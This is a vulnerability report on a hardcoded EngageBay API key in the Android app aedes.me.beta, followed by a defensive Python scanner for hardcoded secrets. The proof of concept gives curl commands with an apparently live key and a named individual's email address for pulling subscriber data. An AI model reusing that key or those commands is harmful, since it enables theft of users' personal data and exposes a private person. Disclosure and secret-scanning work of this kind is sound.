In the Android application aedes.me.beta version 1.18.4, a hardcoded EngageBay API key was discovered in the source file aedes/me/beta/utils/EngageBayUtils.java. An attacker can extract this key through reverse engineering and directly call EngageBay APIs to obtain sensitive user information, including but not limited to names, email addresses, phone numbers, app version, usage behavior (such as report generation records and tags), and other custom fields.
Affected file: aedes/me/beta/utils/EngageBayUtils.java

Interact with EngageBay APIs to retrieve all user information:
curl -v -X POST "https://app.engagebay.com/dev/api/panel/subscribers?limit=1" \
-H "Authorization: vipkirbpkaqcpu4667s087dcpd" \
-H "Accept: application/json" \
-H "Content-Type: application/json" \
-d '{}'
Filter the user's data by email to obtain all sensitive information of that user:
curl -v -X GET "https://app.engagebay.com/dev/api/panel/subscribers/contact-by-email/claudio.costanza86@gmail.com" \
-H "Authorization: vipkirbpkaqcpu4667s087dcpd" \
-H "Accept: application/json"
Remove the hardcoded API key from the APK, immediately revoke and rotate the exposed key in EngageBay, and move all API calls to a secure backend server instead of calling them directly from the client.
An attacker can extract the exposed API key and directly access EngageBay APIs to retrieve sensitive user data at scale, including personal information and usage records. This may lead to large-scale data leakage, privacy violations, regulatory compliance risks, and reputational damage to the application and its users.
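As an added example (not part of this report), a small scanner that flags the kind of hardcoded credential described above in decompiled Java sources: string constants assigned to secret-looking names, and literal Authorization header values. The sample source is constructed to resemble the affected utils class; the key values in it are placeholders, not the real key, and findings are masked so the scanner's own output does not leak a secret.

```python
import re

# Two ways a key typically ends up in client code: a constant whose name
# suggests a secret, and a literal value passed as the Authorization header.
KEY_NAME = re.compile(
    r'(?:static\s+)?(?:final\s+)?String\s+(\w*(?:API_?KEY|SECRET|TOKEN)\w*)\s*=\s*"([^"]{16,})"',
    re.IGNORECASE,
)
AUTH_HEADER = re.compile(
    r'(?:addHeader|setRequestProperty|header)\(\s*"Authorization"\s*,\s*"([^"]+)"\s*\)',
)

# Constructed sample resembling a decompiled utils class; keys are placeholders.
SAMPLE_JAVA = '''
package aedes.me.beta.utils;
public class EngageBayUtils {
    private static final String BASE = "https://app.engagebay.com/dev/api/panel/";
    private static final String ENGAGEBAY_API_KEY = "PLACEHOLDER_KEY_0123456789abcdef";
    public static Request build(String path) {
        return new Request.Builder()
            .url(BASE + path)
            .addHeader("Authorization", ENGAGEBAY_API_KEY)
            .addHeader("Accept", "application/json")
            .build();
    }
    public static Request legacy() {
        return new Request.Builder()
            .addHeader("Authorization", "PLACEHOLDER_KEY_fedcba9876543210")
            .build();
    }
}
'''

def mask(value: str) -> str:
    """Keep only the ends of a secret so a finding can be triaged without copying it."""
    return value[:4] + "..." + value[-4:] if len(value) > 8 else "***"

def find_hardcoded_secrets(source: str):
    """Return (line_number, kind, detail) for each suspicious literal in Java source."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = KEY_NAME.search(line)
        if m:
            findings.append((lineno, "constant", m.group(1)))  # report the name, not the value
        m = AUTH_HEADER.search(line)
        if m:
            findings.append((lineno, "auth-header-literal", mask(m.group(1))))
    return findings

if __name__ == "__main__":
    for lineno, kind, detail in find_hardcoded_secrets(SAMPLE_JAVA):
        print(f"line {lineno}: {kind}: {detail}")
```

Run it over the sources produced by a decompiler (for example the output directory of jadx) instead of SAMPLE_JAVA to check a build before release.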